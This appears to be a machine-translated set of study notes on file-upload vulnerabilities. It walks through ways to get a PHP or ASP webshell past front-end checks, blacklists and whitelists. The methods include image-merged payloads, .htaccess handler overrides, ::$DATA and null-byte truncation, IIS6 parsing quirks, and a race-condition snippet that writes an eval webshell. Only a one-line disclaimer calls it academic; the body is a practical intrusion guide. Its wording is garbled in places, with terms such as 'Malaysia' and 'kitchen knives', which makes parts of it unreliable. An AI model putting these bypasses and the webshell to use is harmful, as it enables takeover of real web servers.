Learning record-file upload parsing vulnerability
Note: This article is only used for academic exchanges, not for other purposes, the deficiencies, many big guys point out
1. Essence
By bypassing the front-end and back-end restrictions, uploading files, the files contain Trojan horse threats, and other vulnerabilities such as parsing can be bypassed. Generally, you can write a word Trojan horse to get the webshell, and use tools such as kitchen knives.
2. Basic knowledge
1) Simple concept
weshell: web permissions
getshell: access to permissions
Passive shell: after the Trojan is injected, the Trojan actively connects to the attacker
Normal shell: After the Trojan is injected, the attacker actively connects to the Trojan
Pony: After the Trojan is injected, the attacker uses it Tool connection, the attacker did not write the attack code
Malaysia: After injecting the Trojan horse, the Trojan horse file contains a large amount of attack code. You do not need to use tools, and you can attack by simply connecting.
2) How to make picture codes The
first method is to make
picture codes by cmd command to make cmd execution: copy a.jpg/b + 1.php 123.jpg Combine php and a.jpg into 123.jpg in a data stream Picture (If you are hiding something, you can compress 1.txt into 1.zip, because the direct execution of the picture will have garbled characters, and then execute the command cp a.jpg/b + 1.zip 123.jpg to get 123.jpg to be changed to zip can be decompressed to see 1.txt)
The second type of picture modification
directly open the picture with the software, directly modify the Trojan horse statement on hex
3) How to judge that the upload is a black and white list mechanism or the front-end restriction
input php file is blocked, input files with arbitrary endings such as 1.a upload is successful, it is blacklist, upload fails, it is whitelist, if the packet capture finds that there is no traffic directly Interception is front-end restriction
4) CGI parsing vulnerabilities
Scope of use: php
web container: Nginx, IIS, etc.
Essence: a/b/c.png/.php Traverse the file from left to right, find the file c.png, and then analyze and find that it ends with php, so Parse c.png in php
5) IIS6.0 parsing vulnerability
1. The default setting is to allow .asa.cer.cdx to be parsed as asp files (you can try against the blacklist, and then use the chopper to connect to get the webshell)
2. The first problem with envoy symbol parsing, the two methods test.asp; xxx.jpg test.asp/xxx.jpg will be parsed as asp files (used in the whitelist, and then use the chopper to connect to get the webshell)
3. Pay attention to one point: To determine whether the server is an IIS container, most of them can be found through the 404 page error report
6) The
essence of secondary rendering is not only to detect uploaded files but also to modify part of the content
7) Windons system in ntfs format $DATA stream
windons system in ntfs format cmd command echo xxx >> 1.txt:a.txt, write xxx in a.txt and mount 1.txt, see from the outside 1. The size of txt is 0kb, it can't be seen with the command dir, and it can be seen by adding the parameter dir /R. The opening mode cmd command: notepad 1.txt:a.txt can be opened to see the content, pay attention to 1.txt=1.txt:: $DATA, display default is not to display $DATA
8) php file file_put_contents function
file_put_contents(file,data) The function of php script writes a string into the file, if the file does not exist, create a new file
9) Distributed configuration file .htaccess
Distributed configuration file .htaccess is used to change the configuration under the directory, with many functions, you can customize redirection, prohibit ip users, etc. It is not enabled by default, and the back-end blacklist is very strict and basic The parseable suffix is limited, but uploading the .htaccess file and writing it to parse the png file into php can bypass the injection of Trojan horses (in case the .htaccess is turned on); the windons system is named .htaccess and some system versions cannot get this Use the name ren 1.txt .htaccess AddType application/x-httpd-php .png
Three, bypass method
Front-end mechanism:
1. Directly pass in the picture code, then intercept the package and change the file type to upload. It is simpler to directly change the suffix of the Trojan file, then intercept the package and modify it. After the upload is successful, the picture address is obtained, and the tool is directly connected to getshell or url. Directly enter the command to access (Trojan is recommended to leave a sentence Trojan)
Back-end blacklist mechanism (upload image code, in order not to be restricted by the front-end restriction and detection of the image header, and then find a way to bypass other back-end restrictions):
1) If only the Content-Type field
upload image code is detected , the package is intercepted and the suffix is modified First name (rarely)
2) The suffix name is not covered
. Upload php3, php4, jspx and other suffixes
3) Unrestricted htaccess file (the function is not turned on by default, but in case it is turned on)
upload the .htaccess file, write AddType application/x-httpd-php.png, and then upload the php file and rename it to png
4) Unrestricted case
Except for very old versions of web containers that are case sensitive, the blacklist restricts php, but uploading PHP web is case sensitive so it cannot be parsed. For other new versions, we can pass PHP to bypass the blacklist php, but the web container is case-insensitive and is parsed according to php to achieve the purpose of bypassing
5) Spaces and dots are not processed.
Cut the package and modify the file name such as ".php or ".php.". Save the spaces and dots after uploading and it will be recognized. The default is cancelled to achieve the purpose of bypassing (dots can only be used in the window background)
6) Unprocessed $DATA The
file in the ntfs format of the hard disk under the windons system is the default::$DATA, and the windons parsing is not displayed by default. For example, 1.txt=1.txt::$DATA, you can try to use this bypass, the background is The window system is then the blacklist is not restricted, you can pass in the file suffix plus such as 1.php::/$DATA can be passed in and parsed as 1.php
7) Do not recycle spaces and dots.
Cut the package to modify the file suffix. You can construct ". ." and empty dots to bypass this attempt
8) It is found that the blacklisted file is directly blank, but there is no loop processing.
Cut the package to modify the file suffix name, you can try to construct such as pphphp to bypass, the backend does not loop directly from left to right to find that php is blank, and the result is not php to bypass
9) If there are IIS6.0 vulnerabilities, the
default setting is to allow .asa.cer.cdx to be parsed as asp files, directly upload these suffixed Trojan files, and then use a chopper to connect to get webshell
Back-end whitelist mechanism (upload image codes, in order not to be restricted by front-end restrictions and detect image headers, and then find a way to bypass other back-end restrictions; most of the whitelists use other vulnerabilities to bypass the purpose):
1) If The saving path field or the saving file name field is
found in the interception of the package. If the saving path field is found in the interception, it is usually in the url. Use 00 truncation to bypass it, and% is required as a hexadecimal identifier, suitable for window systems In the background, if 1.php%00 is added after the url save path, the uploaded image code will be parsed by php
If the file name field is found to be saved by intercepting the package, you can bypass it with 00 truncation, but here you need to modify it in hex, pass a corresponding to 61hex and modify it to 00, add 1.phpa and then modify a to 00 through hex, upload the picture code to php parsing, applicable to the background of the window system
2) If there is a CGI vulnerability to
upload the 1.jpg image code, add /.php after the url access, and the result is 1.jpg/.php to achieve the bypass purpose; if the backend will re-render the uploaded file to modify the uploaded file; upload the gif image After comparing with the original picture, check the unmodified part, modify the hex to inject the Trojan horse, and combine the CGI vulnerability to achieve the bypass
3) If the file is uploaded first, then the logical
file upload is divided into first detection-second upload and first upload-second detection. If it is uploaded first, use this gap to create a Trojan file. This is also called conditional competition, and you can use a php script The function file_put_contents(file,data) such as: <?php file_put_contents('10.php','<?php @eval($_REQUEST[1]); ?>'); ?> Create a 10.php Trojan file, It is recommended to use the burp tool to run, and the access frequency should be less than the upload frequency when setting
4) If there are IIS6.0 vulnerabilities and
special symbols make parsing problems, the two methods test.asp;xxx.jpg test.asp/xxx.jpg will be parsed as an asp file, and then use a chopper to connect to get webshell